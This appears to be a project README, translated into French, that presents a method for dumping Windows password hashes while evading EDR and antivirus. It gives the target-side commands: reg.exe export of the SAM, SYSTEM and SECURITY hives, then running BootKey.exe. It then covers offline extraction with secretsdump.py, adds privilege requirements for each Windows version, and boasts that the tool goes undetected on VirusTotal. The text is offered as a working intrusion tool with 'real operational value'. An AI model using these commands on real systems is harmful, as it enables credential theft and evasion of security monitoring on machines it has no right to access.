
Windows绕过EDR实现DumpHash
Grâce à l'utilisation étendue du programme système Reg.exe, inscrit sur la liste blanche, cette méthode contourne avec ingéniosité les points d'interception des antivirus, permettant ainsi de contourner l'EDR pour réaliser un DumpHash.
D'après les tests effectués, cette méthode s'avère efficace sur les systèmes Windows, elle est simple à mettre en œuvre et présente une réelle valeur opérationnelle.
Articles pratiques sur ce projet :
Après la publication de l'article, aucune approche similaire n'a été trouvée dans les communautés nationale et internationale ; je pensais qu'il s'agissait d'une première mondiale. Cependant, d'après les commentaires de certains lecteurs, cette approche avait déjà été partagée à l'étranger par un expert : Dumping LSA secrets: a story about task decorrelation
Le code source et les releases de ce projet sont publiés sur GitHub. Ce partage n'a pas été facile ; si vous trouvez ce projet utile, n'hésitez pas à m'accorder une étoile (Star), merci infiniment !
Exécutez la commande suivante sur la machine cible pour exporter le fichier .reg :
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg
Téléchargez le fichier .reg de la première étape sur votre machine locale, puis exécutez le script PowerShell RegReduction.ps1 de ce projet pour restaurer les fichiers binaires :
.\RegReduction.ps1
Remarque : après téléchargement du script depuis GitHub, son encodage par défaut est UTF-8 ; vous devez le convertir en ANSI (GB2312) à l'aide du Bloc-notes pour qu'il s'exécute correctement

Exécutez le programme BootKey.exe sur la machine cible, dont le code source est le fichier BootKey.c de ce projet :
BootKey.exe

Test de contournement des antivirus (2026.5.10) : www.virustotal.com

python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

Cette méthode comporte plusieurs opérations clés, mais seules deux étapes principales se déroulent sur la machine cible :
reg.exe export ;BootKey.exe.Des tests ont également été réalisés sur différents systèmes, voici les résultats :
reg.exe export nécessite les privilèges SYSTEM sur Windows 10, Windows 11 et Windows Server 2025, tandis que sur Windows Server 2022 et versions antérieures, de simples privilèges administrateur suffisent (les privilèges SYSTEM ne sont pas requis). Si le fichier exporté avec la commande reg.exe export ne fait que 1 Ko, cela signifie que les privilèges sont insuffisants.BootKey.exe ne nécessite pas de privilèges administrateur, et la plupart des antivirus testés (tous ceux rencontrés jusqu'à présent) ne le détectent pas.